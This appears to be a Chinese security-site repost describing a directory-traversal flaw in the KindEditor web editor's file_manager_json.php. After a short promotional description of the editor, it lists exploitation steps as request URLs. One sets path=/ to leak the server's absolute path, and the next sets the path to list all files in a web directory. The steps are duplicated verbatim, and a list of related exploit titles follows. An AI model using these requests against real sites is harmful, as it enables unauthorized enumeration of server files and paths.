您现在的位置是:网站首页> 编程资料编程资料
Kindeditor遍历目录0DAY问题_漏洞分析_网络安全_
2023-05-24
481人已围观
简介 Kindeditor遍历目录0DAY问题_漏洞分析_网络安全_
KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 KindEditor使用JavaScript编写,可以无缝的于Java、.NET、PHP、ASP等程序接合。 KindEditor非常适合在CMS、商城、论坛、博客、Wiki、电子邮件等互联网应用上使用,2006年7月首次发布2.0以来,KindEditor依靠出色的用户体验和领先的技术不断扩大编辑器市场占有率,目前在国内已经成为最受欢迎的编辑器之一。
利用方法:
1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/,爆出绝对路径D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名
利用方法:
1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/,爆出绝对路径D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名

相关内容
- 历史悠久的3个经典网站安全漏洞介绍_漏洞分析_网络安全_
- WordPress 4.0以下版本存在跨站脚本漏洞_漏洞分析_网络安全_
- 服务器上网站被挂Iframe木马的解决方法_漏洞分析_网络安全_
- LoveCMS 1.6.2 Final Update Settings Remote Exploit _Exploit_网络安全_
- Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit _Exploit_网络安全_
- Sun xVM VirtualBox _Exploit_网络安全_
- BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit _Exploit_网络安全_
- Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC _Exploit_网络安全_
- Belkin wireless G router ADSL2 modem Auth Bypass Exploit _Exploit_网络安全_
- Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit _Exploit_网络安全_
